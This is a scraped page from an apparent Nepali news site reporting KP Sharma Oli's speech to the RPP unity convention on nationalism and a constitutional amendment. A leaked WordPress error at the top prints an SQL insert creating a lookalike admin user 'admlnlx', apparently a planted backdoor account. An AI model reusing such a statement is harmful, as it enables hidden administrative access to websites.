WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIsGqUiozeJpU7X6JlROR/LYj//rwA/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 15:45:45', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ६ –
नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले राष्ट्रियता र राष्ट्रिय एकताको पक्षमा उभिन आह्वान गरेका छन् ।राष्ट्रिय प्रजातन्त्र पार्टीको एकता महाधिवेशनलाई सम्बोधन गर्दै अध्यक्ष ओलीले देश जटिल परिस्थितीमा रहेको भन्दै राप्रपा पनि राष्ट्रियता, राष्ट्रिय एकता र लोकतन्त्रको पक्षमा उभिनसक्नुपर्ने बताए ।
राप्रपा अब नयाँ शक्तिको रुपमा आउनुपर्ने भन्दै ओलीले भने- ‘राम्रो नीति लियो भने एमालेबाहेक अरुलाई धक्का दिन सक्छ ।’उनले नयाँ शक्ति अर्काे पनि थियो भन्दै भने– ‘उहाँलाई पनि मैले राम्रो नीति लिनुस् भने तर नीति त अन्तै गयो । अहिले कहाँ हो कहाँ पुग्यो ।’
अध्यक्ष ओलीले जनताको विरुद्ध रहेको संविधान संशोधन प्रस्ताव कुनै हालतमा पास हुन नदिने बताए ।